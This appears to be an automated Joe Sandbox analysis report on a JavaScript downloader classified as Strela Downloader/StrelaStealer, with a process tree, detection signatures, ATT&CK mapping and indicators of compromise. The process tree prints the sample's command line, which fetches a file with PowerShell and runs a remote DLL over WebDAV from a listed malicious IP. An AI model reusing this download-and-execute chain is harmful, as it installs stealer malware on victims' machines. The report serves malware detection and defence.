Windows
Analysis Report
131612862076531181.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 3480 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\13161 2862076531 181.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 4612 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\182 4024053107 75.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6556 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5740 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 1072 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 2508 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 6940 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 08 --field -trial-han dle=1744,i ,140343986 9363465915 0,17371657 7860021485 92,131072 --disable- features=B ackForward Cache,Calc ulateNativ eWinOcclus ion,WinUse BrowserSpe llChecker /prefetch: 8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 3108 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
7% | Virustotal | Browse | ||
8% | ReversingLabs | Script-JS.Trojan.StrelaStealer |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588938 |
Start date and time: | 2025-01-11 07:23:48 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 3s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 19 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 131612862076531181.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/61@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 2.23.240.205, 162.159.61.3, 172.64.41.3, 2.23.242.162, 23.209.209.135, 199.232.210.172, 2.16.168.105, 2.16.168.107, 23.219.161.132, 192.168.2.9, 13.107.246.45, 52.6.155.20, 4.245.163.56, 23.56.162.204, 20.242.39.171, 172.202.163.200, 52.149.20.212
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, armmf.adobe.com, azureedge-t-prod.trafficmanager.net, geo2.adobe.com
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
01:24:44 | API Interceptor | |
01:24:48 | API Interceptor | |
01:24:48 | API Interceptor | |
01:24:55 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.4932089906937911 |
Encrypted: | false |
SSDEEP: | 1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1Ztaf:cJhXC9lHmutpJyiRDeJ/aUKrDgnmR |
MD5: | 5CBF5D3C9D54E3ECBEBA783BC755E862 |
SHA1: | B8CCB473222876707C16B4D680A7018C7BA50E68 |
SHA-256: | 11342A797017893E46D11C673E41982D829FFC8AC733E9E6A54FD945C24F55EB |
SHA-512: | 8B2CACD59DF4F8A9071DE8D0808C7294B0F6A0C02D1FD6240896142F2A6A73EF09DE871A9516C1E4009A2CA6BD9DAED2E9AE94056BD5E84B6F135AEE74F5394E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7216973545751437 |
Encrypted: | false |
SSDEEP: | 1536:LSB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:LazaNvFv8V2UW/DLzN/w4wZi |
MD5: | 5948DAA2581E68E390F3C915304DEFCE |
SHA1: | 6C22A8F4986580C8DD6F43498B18D462C8F6C586 |
SHA-256: | 87650975137DD75520217098CB288046C079B7DA5465C08ED1340BD0C373BC32 |
SHA-512: | 26A3B7A55F7937AAEB54E40C120D5B8AB1130174F2F7F2A3B9092200AF6E64037C62D353622F2BFBFCAA916C4704E1769D5AF658050129197A7A0405F35F732D |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.08211057516538528 |
Encrypted: | false |
SSDEEP: | 3:W/yYeiBukvhgpJ/fgsCrZClW/tJWChllll/oll+SHY/Xl+/rQLve:5z8D2pxfgs3GZrlAAS4M |
